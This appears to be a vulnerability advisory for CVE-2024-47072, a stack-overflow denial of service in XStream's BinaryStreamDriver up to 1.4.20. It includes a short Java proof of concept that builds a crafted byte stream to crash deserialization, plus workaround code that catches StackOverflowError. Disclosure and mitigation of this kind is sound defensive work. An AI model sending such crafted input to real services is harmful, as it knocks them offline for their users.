### Key Information

#### Vulnerability Description

- **CVE ID**: CVE-2024-47072
- **Affected Versions**: All versions up to and including 1.4.20, when the XStream instance is configured with the BinaryStreamDriver. Fixed in 1.4.21.
- **Description**: XStream provides a BinaryStreamDriver that uses its own optimized serialization format. The format uses IDs to deduplicate string values. During deserialization, the reader handles an ID-mapping token by recursively processing the next regular token in the data stream. By manipulating the input data, an attacker can drive this recursion deep enough to exhaust the thread's stack, producing a StackOverflowError and a denial of service.

#### Reproduction Steps

1. Prepare manipulated data.
2. Provide the data as input to an XStream instance using BinaryStreamDriver.
3. Use the following code example:

```java
import java.io.ByteArrayInputStream;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.binary.BinaryStreamDriver;

// 36000 bytes = 9000 identical 4-byte tokens; every token makes the reader recurse once more.
final byte[] byteArray = new byte[36000];
for (int i = 0; i < byteArray.length / 4; i++) {
    byteArray[i * 4] = 10;
    byteArray[i * 4 + 1] = -127;
    byteArray[i * 4 + 2] = 0;
    byteArray[i * 4 + 3] = 0;
}
XStream xstream = new XStream(new BinaryStreamDriver());
// On 1.4.20 and earlier this call terminates with a StackOverflowError.
xstream.fromXML(new ByteArrayInputStream(byteArray));
```

#### Impact

- Remote attackers can trigger a stack overflow error by manipulating the input stream, leading to a denial of service, provided the instance uses BinaryStreamDriver.

#### Workarounds

- A simple workaround is to catch StackOverflowError in the client code that calls XStream. Note that StackOverflowError extends java.lang.Error, not Exception, so a generic `catch (Exception e)` block does not stop it; it has to be caught explicitly. No other known workarounds exist when using BinaryStreamDriver.

#### Credit

- The vulnerability was discovered and reported to XStream by Alexis Challande of Trail of Bits.
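The workaround above, as an added example that is not part of the advisory or of XStream itself. The class name `SafeBinaryReader`, its `read` method and the choice to rethrow as `IllegalArgumentException` are assumptions for illustration; `XStream.fromXML(InputStream)` and `BinaryStreamDriver` are XStream's real API.

```java
import java.io.InputStream;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.binary.BinaryStreamDriver;

/**
 * Hypothetical wrapper (example code, not from XStream) that applies the
 * advisory's workaround: catch StackOverflowError around the deserialization
 * call. StackOverflowError is a java.lang.Error, so a plain catch (Exception e)
 * would let it propagate and kill the calling thread.
 */
public final class SafeBinaryReader {

    private final XStream xstream;

    public SafeBinaryReader() {
        // Same driver the advisory is about; further allow-listing of types
        // is unrelated to this CVE and is left to the application.
        this.xstream = new XStream(new BinaryStreamDriver());
    }

    /**
     * Deserializes an object from an XStream binary stream. A crafted stream
     * that exhausts the stack is reported as an IllegalArgumentException that
     * ordinary error handling in the caller can deal with.
     */
    public Object read(InputStream in) {
        try {
            return xstream.fromXML(in);
        } catch (StackOverflowError e) {
            // Input is attacker-controlled; treat the overflow as bad input, not as a crash.
            throw new IllegalArgumentException(
                    "rejected binary stream: deserialization exceeded the stack limit", e);
        }
    }
}
```

Catching the error keeps the process alive, but each crafted request still burns CPU and stack until the overflow fires, so this is a stopgap; upgrading to a fixed release is the actual remedy.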